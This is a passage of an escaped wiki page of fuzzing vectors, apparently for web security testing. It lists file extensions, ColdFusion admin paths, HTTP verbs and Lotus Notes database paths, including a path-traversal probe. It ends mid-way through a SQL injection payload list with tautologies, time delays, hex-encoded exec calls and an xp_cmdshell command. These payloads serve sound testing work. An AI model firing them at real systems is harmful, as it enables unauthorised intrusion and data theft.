.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
